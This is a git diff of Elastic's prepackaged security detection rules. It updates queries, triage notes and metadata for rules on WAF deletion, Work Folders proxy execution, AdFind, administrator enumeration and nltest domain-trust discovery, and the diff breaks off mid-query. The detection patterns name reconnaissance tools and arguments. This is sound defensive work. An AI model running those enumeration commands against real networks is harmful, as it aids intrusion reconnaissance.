b/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/defense_evasion_waf_rule_or_rule_group_deletion.json @@ -15,14 +15,44 @@ "language": "kuery", "license": "Elastic License v2", "name": "AWS WAF Rule or Rule Group Deletion", - "note": "## Config\n\nThe AWS Fleet integration, Filebeat module, or similarly structured data is required to be compatible with this rule.", + "note": "", "query": "event.dataset:aws.cloudtrail and event.provider:(waf.amazonaws.com or waf-regional.amazonaws.com or wafv2.amazonaws.com) and event.action:(DeleteRule or DeleteRuleGroup) and event.outcome:success\n", "references": [ "https://awscli.amazonaws.com/v2/documentation/api/latest/reference/waf/delete-rule-group.html", "https://docs.aws.amazon.com/waf/latest/APIReference/API_waf_DeleteRuleGroup.html" ], + "related_integrations": [ + { + "integration": "cloudtrail", + "package": "aws", + "version": "1.10.2" + } + ], + "required_fields": [ + { + "ecs": true, + "name": "event.action", + "type": "keyword" + }, + { + "ecs": true, + "name": "event.dataset", + "type": "keyword" + }, + { + "ecs": true, + "name": "event.outcome", + "type": "keyword" + }, + { + "ecs": true, + "name": "event.provider", + "type": "keyword" + } + ], "risk_score": 47, "rule_id": "5beaebc1-cc13-4bfc-9949-776f9e0dc318", + "setup": "The AWS Fleet integration, Filebeat module, or similarly structured data is required to be compatible with this rule.", "severity": "medium", "tags": [ "Elastic", @@ -58,5 +88,5 @@ ], "timestamp_override": "event.ingested", "type": "query", - "version": 8 + "version": 10 } diff --git a/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/defense_evasion_whitespace_padding_in_command_line.json b/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/defense_evasion_whitespace_padding_in_command_line.json deleted file mode 100644 index 177644038b3cc..0000000000000 --- a/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/defense_evasion_whitespace_padding_in_command_line.json +++ /dev/null @@ -1,44 +0,0 @@ -{ - "author": [ - "Elastic" - ], - "description": "Identifies process execution events where the command line value contains a long sequence of whitespace characters or multiple occurrences of contiguous whitespace. Attackers may attempt to evade signature-based detections by padding their malicious command with unnecessary whitespace characters. These observations should be investigated for malicious behavior.", - "from": "now-9m", - "index": [ - "winlogbeat-*", - "logs-endpoint.events.*", - "logs-windows.*" - ], - "language": "eql", - "license": "Elastic License v2", - "name": "Whitespace Padding in Process Command Line", - "note": "## Triage and analysis\n\n- Analyze the command line of the process in question for evidence of malicious code execution.\n- Review the ancestor and child processes spawned by the process in question for indicators of further malicious code execution.\n\n## Config\n\nIf enabling an EQL rule on a non-elastic-agent index (such as beats) for versions <8.2, events will not define `event.ingested` and default fallback for EQL rules was not added until 8.2, so you will need to add a custom pipeline to populate `event.ingested` to @timestamp for this rule to work.\n", - "query": "process where event.type in (\"start\", \"process_started\") and\n process.command_line regex \".*[ ]{20,}.*\" or \n \n /* this will match on 3 or more separate occurrences of 3+ contiguous whitespace characters */\n process.command_line regex \"([^ ]+[ ]{3,}[^ ]*){3,}.*\"\n", - "references": [ - "https://twitter.com/JohnLaTwC/status/1419251082736201737" - ], - "risk_score": 47, - "rule_id": "e0dacebe-4311-4d50-9387-b17e89c2e7fd", - "severity": "medium", - "tags": [ - "Elastic", - "Host", - "Windows", - "Threat Detection", - "Defense Evasion" - ], - "threat": [ - { - "framework": "MITRE ATT&CK", - "tactic": { - "id": "TA0005", - "name": "Defense Evasion", - "reference": "https://attack.mitre.org/tactics/TA0005/" - }, - "technique": [] - } - ], - "timestamp_override": "event.ingested", - "type": "eql", - "version": 9 -} diff --git a/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/defense_evasion_workfolders_control_execution.json b/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/defense_evasion_workfolders_control_execution.json index 392fd07b55112..2921592b61423 100644 --- a/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/defense_evasion_workfolders_control_execution.json +++ b/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/defense_evasion_workfolders_control_execution.json @@ -12,15 +12,38 @@ "language": "eql", "license": "Elastic License v2", "name": "Signed Proxy Execution via MS Work Folders", - "note": "## Triage and analysis\n\n### Investigating Signed Proxy Execution via MS Work Folders\n\nWork Folders is a role service for file servers running Windows Server that provides a consistent way for users to access\ntheir work files from their PCs and devices. This allows users to store work files and access them from anywhere. When\ncalled, Work Folders will automatically execute any Portable Executable (PE) named control.exe as an argument before\naccessing the synced share.\n\nUsing Work Folders to execute a masqueraded control.exe could allow an adversary to bypass application controls and\nincrease privileges.\n \n#### Possible investigation steps\n\n- Investigate the process tree starting with parent process WorkFolders.exe and child process control.exe to determine\nif other child processes spawned during execution.\n- Trace the activity related to the control.exe binary to identify any continuing intrusion activity on the host.\n- Examine the location of the WorkFolders.exe binary to determine if it was copied to the location of the control.exe\nbinary. It resides in the System32 directory by default.\n- Review the control.exe binary executed with Work Folders to determine maliciousness such as additional host activity\nor network traffic.\n- Determine if control.exe was synced to sync share, indicating potential lateral movement.\n- Review how control.exe was originally delivered on the host, such as emailed, downloaded from the web, or written to\ndisk from a separate binary.\n \n### False positive analysis \n\n- Windows Work Folders are used legitimately by end users and administrators for file sharing and syncing but not in the\ninstance where a suspicious control.exe is passed as an argument.\n\n### Response and remediation \n\n- Initiate the incident response process based on the outcome of the triage.\n- Isolate the involved host to prevent further post-compromise behavior.\n- Review the Work Folders synced share to determine if the control.exe was shared and if so remove it.\n- If no lateral movement was identified during investigation, take the affected host offline if possible and remove the\ncontrol.exe binary as well as any additional artifacts identified during investigation.\n- Review integrating Windows Information Protection (WIP) to enforce data protection by encrypting the data on PCs using\nWork Folders.\n- Confirm with the user whether this was expected or not, and reset their password.\n\n## Config\n\nIf enabling an EQL rule on a non-elastic-agent index (such as beats) for versions <8.2, events will not define `event.ingested` and default fallback for EQL rules was not added until 8.2, so you will need to add a custom pipeline to populate `event.ingested` to @timestamp for this rule to work.\n", + "note": "## Triage and analysis\n\n### Investigating Signed Proxy Execution via MS Work Folders\n\nWork Folders is a role service for file servers running Windows Server that provides a consistent way for users to access\ntheir work files from their PCs and devices. This allows users to store work files and access them from anywhere. When\ncalled, Work Folders will automatically execute any Portable Executable (PE) named control.exe as an argument before\naccessing the synced share.\n\nUsing Work Folders to execute a masqueraded control.exe could allow an adversary to bypass application controls and\nincrease privileges.\n\n#### Possible investigation steps\n\n- Investigate the process tree starting with parent process WorkFolders.exe and child process control.exe to determine\nif other child processes spawned during execution.\n- Trace the activity related to the control.exe binary to identify any continuing intrusion activity on the host.\n- Examine the location of the WorkFolders.exe binary to determine if it was copied to the location of the control.exe\nbinary. It resides in the System32 directory by default.\n- Review the control.exe binary executed with Work Folders to determine maliciousness such as additional host activity\nor network traffic.\n- Determine if control.exe was synced to sync share, indicating potential lateral movement.\n- Review how control.exe was originally delivered on the host, such as emailed, downloaded from the web, or written to\ndisk from a separate binary.\n\n### False positive analysis\n\n- Windows Work Folders are used legitimately by end users and administrators for file sharing and syncing but not in the\ninstance where a suspicious control.exe is passed as an argument.\n\n### Response and remediation\n\n- Initiate the incident response process based on the outcome of the triage.\n- Isolate the involved host to prevent further post-compromise behavior.\n- Review the Work Folders synced share to determine if the control.exe was shared and if so remove it.\n- If no lateral movement was identified during investigation, take the affected host offline if possible and remove the\ncontrol.exe binary as well as any additional artifacts identified during investigation.\n- Review integrating Windows Information Protection (WIP) to enforce data protection by encrypting the data on PCs using\nWork Folders.\n- Confirm with the user whether this was expected or not, and reset their password.", "query": "process where event.type in (\"start\",\"process_started\")\n and process.name : \"control.exe\" and process.parent.name : \"WorkFolders.exe\"\n and not process.executable : (\"?:\\\\Windows\\\\System32\\\\control.exe\", \"?:\\\\Windows\\\\SysWOW64\\\\control.exe\")\n", "references": [ "https://docs.microsoft.com/en-us/windows-server/storage/work-folders/work-folders-overview", "https://twitter.com/ElliotKillick/status/1449812843772227588", "https://lolbas-project.github.io/lolbas/Binaries/WorkFolders/" ], + "required_fields": [ + { + "ecs": true, + "name": "event.type", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.executable", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.name", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.parent.name", + "type": "keyword" + } + ], "risk_score": 47, "rule_id": "ad0d2742-9a49-11ec-8d6b-acde48001122", + "setup": "If enabling an EQL rule on a non-elastic-agent index (such as beats) for versions <8.2, events will not define `event.ingested` and default fallback for EQL rules was not added until 8.2, so you will need to add a custom pipeline to populate `event.ingested` to @timestamp for this rule to work.", "severity": "medium", "tags": [ "Elastic", @@ -40,7 +63,7 @@ "technique": [ { "id": "T1218", - "name": "Signed Binary Proxy Execution", + "name": "System Binary Proxy Execution", "reference": "https://attack.mitre.org/techniques/T1218/" } ] @@ -48,5 +71,5 @@ ], "timestamp_override": "event.ingested", "type": "eql", - "version": 2 + "version": 4 } diff --git a/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/discovery_adfind_command_activity.json b/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/discovery_adfind_command_activity.json index e8f31c677cfc7..5b57b1323de8a 100644 --- a/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/discovery_adfind_command_activity.json +++ b/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/discovery_adfind_command_activity.json @@ -12,8 +12,8 @@ "language": "eql", "license": "Elastic License v2", "name": "AdFind Command Activity", - "note": "## Triage and analysis\n\n### Investigating AdFind Command Activity\n\n[AdFind](http://www.joeware.net/freetools/tools/adfind/) is a freely available command-line tool used to retrieve information\nfrom Active Directory (AD). Network discovery and enumeration tools like `AdFind` are useful to adversaries in the same\nways they are effective for network administrators. This tool provides quick ability to scope AD person/computer objects\nand understand subnets and domain information. There are many [examples](https://thedfirreport.com/category/adfind/) of\nthis tool being adopted by ransomware and criminal groups and used in compromises.\n\n#### Possible investigation steps\n\n- Investigate the process execution chain (parent process tree) for unknown processes. Examine their executable files\nfor prevalence, whether they are located in expected locations, and if they are signed with valid digital signatures.\n- Identify the user account that performed the action and whether it should perform this kind of action.\n- Examine the command line to determine what information was retrieved by the tool.\n- Contact the account owner and confirm whether they are aware of this activity.\n- Investigate other alerts associated with the user/host during the past 48 hours.\n\n### False positive analysis\n\n- This rule has a high chance to produce false positives as it is a legitimate tool used by network administrators.\n- If this activity is expected and noisy in your environment, consider adding exceptions \u2014 preferably with a combination\nof user and command line conditions.\n- Malicious behavior with `AdFind` should be investigated as part of a step within an attack chain. It doesn't happen in\nisolation, so reviewing previous logs/activity from impacted machines can be very telling.\n\n### Related rules\n\n- Windows Network Enumeration - 7b8bfc26-81d2-435e-965c-d722ee397ef1\n- Enumeration of Administrator Accounts - 871ea072-1b71-4def-b016-6278b505138d\n- Enumeration Command Spawned via WMIPrvSE - 770e0c4d-b998-41e5-a62e-c7901fd7f470\n\n### Response and remediation\n\n- Initiate the incident response process based on the outcome of the triage.\n- Isolate the involved host to prevent further post-compromise behavior.\n- Investigate credential exposure on systems compromised or used by the attacker to ensure all compromised accounts are\nidentified. Reset passwords for these accounts and other potentially compromised credentials, such as email, business\nsystems, and web services.\n- Run a full antimalware scan. This may reveal additional artifacts left in the system, persistence mechanisms, and\nmalware components.\n- Determine the initial vector abused by the attacker and take action to prevent reinfection through the same vector.\n- Using the incident response data, update logging and audit policies to improve the mean time to detect (MTTD) and the\nmean time to respond (MTTR).\n\n## Config\n\nIf enabling an EQL rule on a non-elastic-agent index (such as beats) for versions <8.2, events will not define `event.ingested` and default fallback for EQL rules was not added until 8.2, so you will need to add a custom pipeline to populate `event.ingested` to @timestamp for this rule to work.\n", - "query": "process where event.type in (\"start\", \"process_started\") and \n (process.name : \"AdFind.exe\" or process.pe.original_file_name == \"AdFind.exe\") and \n process.args : (\"objectcategory=computer\", \"(objectcategory=computer)\", \n \"objectcategory=person\", \"(objectcategory=person)\",\n \"objectcategory=subnet\", \"(objectcategory=subnet)\",\n \"objectcategory=group\", \"(objectcategory=group)\", \n \"objectcategory=organizationalunit\", \"(objectcategory=organizationalunit)\",\n \"objectcategory=attributeschema\", \"(objectcategory=attributeschema)\",\n \"domainlist\", \"dcmodes\", \"adinfo\", \"dclist\", \"computers_pwnotreqd\", \"trustdmp\")\n", + "note": "## Triage and analysis\n\n### Investigating AdFind Command Activity\n\n[AdFind](http://www.joeware.net/freetools/tools/adfind/) is a freely available command-line tool used to retrieve information\nfrom Active Directory (AD). Network discovery and enumeration tools like `AdFind` are useful to adversaries in the same\nways they are effective for network administrators. This tool provides quick ability to scope AD person/computer objects\nand understand subnets and domain information. There are many [examples](https://thedfirreport.com/category/adfind/) of\nthis tool being adopted by ransomware and criminal groups and used in compromises.\n\n#### Possible investigation steps\n\n- Investigate the process execution chain (parent process tree) for unknown processes. Examine their executable files\nfor prevalence, whether they are located in expected locations, and if they are signed with valid digital signatures.\n- Identify the user account that performed the action and whether it should perform this kind of action.\n- Examine the command line to determine what information was retrieved by the tool.\n- Contact the account owner and confirm whether they are aware of this activity.\n- Investigate other alerts associated with the user/host during the past 48 hours.\n\n### False positive analysis\n\n- This rule has a high chance to produce false positives as it is a legitimate tool used by network administrators.\n- If this rule is noisy in your environment due to expected activity, consider adding exceptions \u2014 preferably with a combination\nof user and command line conditions.\n- Malicious behavior with `AdFind` should be investigated as part of a step within an attack chain. It doesn't happen in\nisolation, so reviewing previous logs/activity from impacted machines can be very telling.\n\n### Related rules\n\n- Windows Network Enumeration - 7b8bfc26-81d2-435e-965c-d722ee397ef1\n- Enumeration of Administrator Accounts - 871ea072-1b71-4def-b016-6278b505138d\n- Enumeration Command Spawned via WMIPrvSE - 770e0c4d-b998-41e5-a62e-c7901fd7f470\n\n### Response and remediation\n\n- Initiate the incident response process based on the outcome of the triage.\n- Isolate the involved host to prevent further post-compromise behavior.\n- Investigate credential exposure on systems compromised or used by the attacker to ensure all compromised accounts are\nidentified. Reset passwords for these accounts and other potentially compromised credentials, such as email, business\nsystems, and web services.\n- Run a full antimalware scan. This may reveal additional artifacts left in the system, persistence mechanisms, and\nmalware components.\n- Determine the initial vector abused by the attacker and take action to prevent reinfection through the same vector.\n- Using the incident response data, update logging and audit policies to improve the mean time to detect (MTTD) and the\nmean time to respond (MTTR).", + "query": "process where event.type in (\"start\", \"process_started\") and\n (process.name : \"AdFind.exe\" or process.pe.original_file_name == \"AdFind.exe\") and\n process.args : (\"objectcategory=computer\", \"(objectcategory=computer)\",\n \"objectcategory=person\", \"(objectcategory=person)\",\n \"objectcategory=subnet\", \"(objectcategory=subnet)\",\n \"objectcategory=group\", \"(objectcategory=group)\",\n \"objectcategory=organizationalunit\", \"(objectcategory=organizationalunit)\",\n \"objectcategory=attributeschema\", \"(objectcategory=attributeschema)\",\n \"domainlist\", \"dcmodes\", \"adinfo\", \"dclist\", \"computers_pwnotreqd\", \"trustdmp\")\n", "references": [ "http://www.joeware.net/freetools/tools/adfind/", "https://thedfirreport.com/2020/05/08/adfind-recon/", @@ -22,8 +22,31 @@ "https://www.fireeye.com/blog/threat-research/2019/04/pick-six-intercepting-a-fin6-intrusion.html", "https://usa.visa.com/dam/VCOM/global/support-legal/documents/fin6-cybercrime-group-expands-threat-To-ecommerce-merchants.pdf" ], + "required_fields": [ + { + "ecs": true, + "name": "event.type", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.args", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.name", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.pe.original_file_name", + "type": "keyword" + } + ], "risk_score": 21, "rule_id": "eda499b8-a073-4e35-9733-22ec71f57f3a", + "setup": "If enabling an EQL rule on a non-elastic-agent index (such as beats) for versions <8.2, events will not define `event.ingested` and default fallback for EQL rules was not added until 8.2, so you will need to add a custom pipeline to populate `event.ingested` to @timestamp for this rule to work.", "severity": "low", "tags": [ "Elastic", @@ -80,5 +103,5 @@ ], "timestamp_override": "event.ingested", "type": "eql", - "version": 8 + "version": 10 } diff --git a/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/discovery_admin_recon.json b/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/discovery_admin_recon.json index 5744f96fb3469..70210662313d5 100644 --- a/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/discovery_admin_recon.json +++ b/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/discovery_admin_recon.json @@ -12,10 +12,38 @@ "language": "eql", "license": "Elastic License v2", "name": "Enumeration of Administrator Accounts", - "note": "## Triage and analysis\n\n### Investigating Enumeration of Administrator Accounts\n\nAfter successfully compromising an environment, attackers may try to gain situational awareness to plan their next steps.\nThis can happen by running commands to enumerate network resources, users, connections, files, and installed security\nsoftware.\n\nThis rule looks for the execution of the `net` and `wmic` utilities to enumerate administrator-related users or groups \nin the domain and local machine scope. Attackers can use this information to plan their next steps of the attack, such\nas mapping targets for credential compromise and other post-exploitation activities.\n\n#### Possible investigation steps\n\n- Investigate the process execution chain (parent process tree) for unknown processes. Examine their executable files\nfor prevalence, whether they are located in expected locations, and if they are signed with valid digital signatures.\n- Identify the user account that performed the action and whether it should perform this kind of action.\n- Investigate other alerts associated with the user/host during the past 48 hours.\n- Investigate abnormal behaviors observed using the account, such as commands executed, files created or modified, and\nnetwork connections.\n\n### False positive analysis\n\n- Discovery activities are not inherently malicious if they occur in isolation. As long as the analyst did not identify\nsuspicious activity related to the user or host, such alerts can be dismissed.\n\n### Related rules\n\n- AdFind Command Activity - eda499b8-a073-4e35-9733-22ec71f57f3a\n\n### Response and remediation\n\n- Initiate the incident response process based on the outcome of the triage.\n- Isolate the involved hosts to prevent further post-compromise behavior.\n- Investigate credential exposure on systems compromised or used by the attacker to ensure all compromised accounts are\nidentified. Reset passwords for these accounts and other potentially compromised credentials, such as email, business\nsystems, and web services.\n- Run a full antimalware scan. This may reveal additional artifacts left in the system, persistence mechanisms, and\nmalware components.\n- Determine the initial vector abused by the attacker and take action to prevent reinfection via the same vector.\n- Using the incident response data, update logging and audit policies to improve the mean time to detect (MTTD) and the\nmean time to respond (MTTR).\n\n## Config\n\nIf enabling an EQL rule on a non-elastic-agent index (such as beats) for versions <8.2, events will not define `event.ingested` and default fallback for EQL rules was not added until 8.2, so you will need to add a custom pipeline to populate `event.ingested` to @timestamp for this rule to work.\n", + "note": "## Triage and analysis\n\n### Investigating Enumeration of Administrator Accounts\n\nAfter successfully compromising an environment, attackers may try to gain situational awareness to plan their next steps.\nThis can happen by running commands to enumerate network resources, users, connections, files, and installed security\nsoftware.\n\nThis rule looks for the execution of the `net` and `wmic` utilities to enumerate administrator-related users or groups\nin the domain and local machine scope. Attackers can use this information to plan their next steps of the attack, such\nas mapping targets for credential compromise and other post-exploitation activities.\n\n#### Possible investigation steps\n\n- Investigate the process execution chain (parent process tree) for unknown processes. Examine their executable files\nfor prevalence, whether they are located in expected locations, and if they are signed with valid digital signatures.\n- Identify the user account that performed the action and whether it should perform this kind of action.\n- Investigate other alerts associated with the user/host during the past 48 hours.\n- Investigate abnormal behaviors observed using the account, such as commands executed, files created or modified, and\nnetwork connections.\n\n### False positive analysis\n\n- Discovery activities are not inherently malicious if they occur in isolation. As long as the analyst did not identify\nsuspicious activity related to the user or host, such alerts can be dismissed.\n\n### Related rules\n\n- AdFind Command Activity - eda499b8-a073-4e35-9733-22ec71f57f3a\n\n### Response and remediation\n\n- Initiate the incident response process based on the outcome of the triage.\n- Isolate the involved hosts to prevent further post-compromise behavior.\n- Investigate credential exposure on systems compromised or used by the attacker to ensure all compromised accounts are\nidentified. Reset passwords for these accounts and other potentially compromised credentials, such as email, business\nsystems, and web services.\n- Run a full antimalware scan. This may reveal additional artifacts left in the system, persistence mechanisms, and\nmalware components.\n- Determine the initial vector abused by the attacker and take action to prevent reinfection via the same vector.\n- Using the incident response data, update logging and audit policies to improve the mean time to detect (MTTD) and the\nmean time to respond (MTTR).", "query": "process where event.type in (\"start\", \"process_started\") and\n (((process.name : \"net.exe\" or process.pe.original_file_name == \"net.exe\") or\n ((process.name : \"net1.exe\" or process.pe.original_file_name == \"net1.exe\") and\n not process.parent.name : \"net.exe\")) and\n process.args : (\"group\", \"user\", \"localgroup\") and\n process.args : (\"admin\", \"Domain Admins\", \"Remote Desktop Users\", \"Enterprise Admins\", \"Organization Management\") and\n not process.args : \"/add\")\n\n or\n\n ((process.name : \"wmic.exe\" or process.pe.original_file_name == \"wmic.exe\") and\n process.args : (\"group\", \"useraccount\"))\n", + "required_fields": [ + { + "ecs": true, + "name": "event.type", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.args", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.name", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.parent.name", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.pe.original_file_name", + "type": "keyword" + } + ], "risk_score": 21, "rule_id": "871ea072-1b71-4def-b016-6278b505138d", + "setup": "If enabling an EQL rule on a non-elastic-agent index (such as beats) for versions <8.2, events will not define `event.ingested` and default fallback for EQL rules was not added until 8.2, so you will need to add a custom pipeline to populate `event.ingested` to @timestamp for this rule to work.", "severity": "low", "tags": [ "Elastic", @@ -55,5 +83,5 @@ ], "timestamp_override": "event.ingested", "type": "eql", - "version": 6 + "version": 8 } diff --git a/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/discovery_blob_container_access_mod.json b/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/discovery_blob_container_access_mod.json index ed50b58a91e13..68d7eb43809e7 100644 --- a/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/discovery_blob_container_access_mod.json +++ b/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/discovery_blob_container_access_mod.json @@ -14,13 +14,38 @@ "language": "kuery", "license": "Elastic License v2", "name": "Azure Blob Container Access Level Modification", - "note": "## Config\n\nThe Azure Fleet integration, Filebeat module, or similarly structured data is required to be compatible with this rule.", + "note": "", "query": "event.dataset:azure.activitylogs and azure.activitylogs.operation_name:\"MICROSOFT.STORAGE/STORAGEACCOUNTS/BLOBSERVICES/CONTAINERS/WRITE\" and event.outcome:(Success or success)\n", "references": [ "https://docs.microsoft.com/en-us/azure/storage/blobs/anonymous-read-access-prevent" ], + "related_integrations": [ + { + "integration": "activitylogs", + "package": "azure", + "version": "0.12.0" + } + ], + "required_fields": [ + { + "ecs": false, + "name": "azure.activitylogs.operation_name", + "type": "keyword" + }, + { + "ecs": true, + "name": "event.dataset", + "type": "keyword" + }, + { + "ecs": true, + "name": "event.outcome", + "type": "keyword" + } + ], "risk_score": 21, "rule_id": "2636aa6c-88b5-4337-9c31-8d0192a8ef45", + "setup": "The Azure Fleet integration, Filebeat module, or similarly structured data is required to be compatible with this rule.", "severity": "low", "tags": [ "Elastic", @@ -64,5 +89,5 @@ ], "timestamp_override": "event.ingested", "type": "query", - "version": 5 + "version": 7 } diff --git a/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/discovery_command_system_account.json b/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/discovery_command_system_account.json index e3455e2d3490c..270d3f75e74f2 100644 --- a/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/discovery_command_system_account.json +++ b/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/discovery_command_system_account.json @@ -12,10 +12,38 @@ "language": "eql", "license": "Elastic License v2", "name": "Account Discovery Command via SYSTEM Account", - "note": "## Triage and analysis\n\n### Investigating Account Discovery Command via SYSTEM Account\n\nAfter successfully compromising an environment, attackers may try to gain situational awareness to plan their next steps.\nThis can happen by running commands to enumerate network resources, users, connections, files, and installed security\nsoftware.\n\nThis rule looks for the execution of account discovery utilities using the SYSTEM account, which is commonly observed\nafter attackers successfully perform privilege escalation or exploit web applications.\n\n#### Possible investigation steps\n\n- Investigate the process execution chain (parent process tree) for unknown processes. Examine their executable files\nfor prevalence, whether they are located in expected locations, and if they are signed with valid digital signatures.\n - If the process tree includes a web-application server process such as w3wp, httpd.exe, nginx.exe and alike,\n investigate any suspicious file creation or modification in the last 48 hours to assess the presence of any potential\n webshell backdoor.\n- Investigate other alerts associated with the user/host during the past 48 hours.\n- Determine how the SYSTEM account is being used. For example, users with administrator privileges can spawn a system\nshell using Windows services, scheduled tasks or other third party utilities.\n\n### False positive analysis\n\n- Discovery activities are not inherently malicious if they occur in isolation. As long as the analyst did not identify\nsuspicious activity related to the user or host, such alerts can be dismissed.\n\n### Response and remediation\n\n- Initiate the incident response process based on the outcome of the triage.\n- Isolate the involved hosts to prevent further post-compromise behavior.\n- Investigate credential exposure on systems compromised or used by the attacker to ensure all compromised accounts are\nidentified. Reset passwords for these accounts and other potentially compromised credentials, such as email, business\nsystems, and web services.\n- Run a full antimalware scan. This may reveal additional artifacts left in the system, persistence mechanisms, and\nmalware components.\n- Determine the initial vector abused by the attacker and take action to prevent reinfection via the same vector.\n- Using the incident response data, update logging and audit policies to improve the mean time to detect (MTTD) and the\nmean time to respond (MTTR).\n- Use the data collected through the analysis to investigate other machines affected in the environment.\n\n## Config\n\nIf enabling an EQL rule on a non-elastic-agent index (such as beats) for versions <8.2, events will not define `event.ingested` and default fallback for EQL rules was not added until 8.2, so you will need to add a custom pipeline to populate `event.ingested` to @timestamp for this rule to work.\n", - "query": "process where event.type in (\"start\", \"process_started\") and \n (?process.Ext.token.integrity_level_name : \"System\" or\n ?winlog.event_data.IntegrityLevel : \"System\") and\n (process.name : \"whoami.exe\" or\n (process.name : \"net1.exe\" and not process.parent.name : \"net.exe\"))\n", + "note": "## Triage and analysis\n\n### Investigating Account Discovery Command via SYSTEM Account\n\nAfter successfully compromising an environment, attackers may try to gain situational awareness to plan their next steps.\nThis can happen by running commands to enumerate network resources, users, connections, files, and installed security\nsoftware.\n\nThis rule looks for the execution of account discovery utilities using the SYSTEM account, which is commonly observed\nafter attackers successfully perform privilege escalation or exploit web applications.\n\n#### Possible investigation steps\n\n- Investigate the process execution chain (parent process tree) for unknown processes. Examine their executable files\nfor prevalence, whether they are located in expected locations, and if they are signed with valid digital signatures.\n - If the process tree includes a web-application server process such as w3wp, httpd.exe, nginx.exe and alike,\n investigate any suspicious file creation or modification in the last 48 hours to assess the presence of any potential\n webshell backdoor.\n- Investigate other alerts associated with the user/host during the past 48 hours.\n- Determine how the SYSTEM account is being used. For example, users with administrator privileges can spawn a system\nshell using Windows services, scheduled tasks or other third party utilities.\n\n### False positive analysis\n\n- Discovery activities are not inherently malicious if they occur in isolation. As long as the analyst did not identify\nsuspicious activity related to the user or host, such alerts can be dismissed.\n\n### Response and remediation\n\n- Initiate the incident response process based on the outcome of the triage.\n- Isolate the involved hosts to prevent further post-compromise behavior.\n- Investigate credential exposure on systems compromised or used by the attacker to ensure all compromised accounts are\nidentified. Reset passwords for these accounts and other potentially compromised credentials, such as email, business\nsystems, and web services.\n- Run a full antimalware scan. This may reveal additional artifacts left in the system, persistence mechanisms, and\nmalware components.\n- Determine the initial vector abused by the attacker and take action to prevent reinfection via the same vector.\n- Using the incident response data, update logging and audit policies to improve the mean time to detect (MTTD) and the\nmean time to respond (MTTR).\n- Use the data collected through the analysis to investigate other machines affected in the environment.", + "query": "process where event.type in (\"start\", \"process_started\") and\n (?process.Ext.token.integrity_level_name : \"System\" or\n ?winlog.event_data.IntegrityLevel : \"System\") and\n (process.name : \"whoami.exe\" or\n (process.name : \"net1.exe\" and not process.parent.name : \"net.exe\"))\n", + "required_fields": [ + { + "ecs": true, + "name": "event.type", + "type": "keyword" + }, + { + "ecs": false, + "name": "process.Ext.token.integrity_level_name", + "type": "unknown" + }, + { + "ecs": true, + "name": "process.name", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.parent.name", + "type": "keyword" + }, + { + "ecs": false, + "name": "winlog.event_data.IntegrityLevel", + "type": "keyword" + } + ], "risk_score": 21, "rule_id": "2856446a-34e6-435b-9fb5-f8f040bfa7ed", + "setup": "If enabling an EQL rule on a non-elastic-agent index (such as beats) for versions <8.2, events will not define `event.ingested` and default fallback for EQL rules was not added until 8.2, so you will need to add a custom pipeline to populate `event.ingested` to @timestamp for this rule to work.", "severity": "low", "tags": [ "Elastic", @@ -43,5 +71,5 @@ ], "timestamp_override": "event.ingested", "type": "eql", - "version": 12 + "version": 14 } diff --git a/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/discovery_enumerating_domain_trusts_via_nltest.json b/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/discovery_enumerating_domain_trusts_via_nltest.json new file mode 100644 index 0000000000000..777281ef1a4cd --- /dev/null +++ b/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/discovery_enumerating_domain_trusts_via_nltest.json @@ -0,0 +1,72 @@ +{ + "author": [ + "Elastic" + ], + "description": "Identifies the use of nltest.exe for domain trust discovery purposes. Adversaries may use this command-line utility to enumerate domain trusts and gain insight into trust relationships, as well as the state of Domain Controller (DC) replication in a Microsoft Windows NT Domain.", + "false_positives": [ + "Domain administrators may use this command-line utility for legitimate information gathering purposes, but it is not common for environments with Windows Server 2012 and newer." + ], + "from": "now-9m", + "index": [ + "winlogbeat-*", + "logs-endpoint.events.*", + "logs-windows.*" + ], + "language": "eql", + "license": "Elastic License v2", + "name": "Enumerating Domain Trusts via NLTEST.EXE", + "note": "", + "query": "process where event.type in (\"start\", \"process_started\") and\n process.name : \"nltest.exe\" and process.args : (\n \"/DCLIST:*\", \"/DCNAME:*\", \"/DSGET*\",\n \"/LSAQUERYFTI:*\", \"/PARENTDOMAIN\",\n \"/DOMAIN_TRUSTS\", 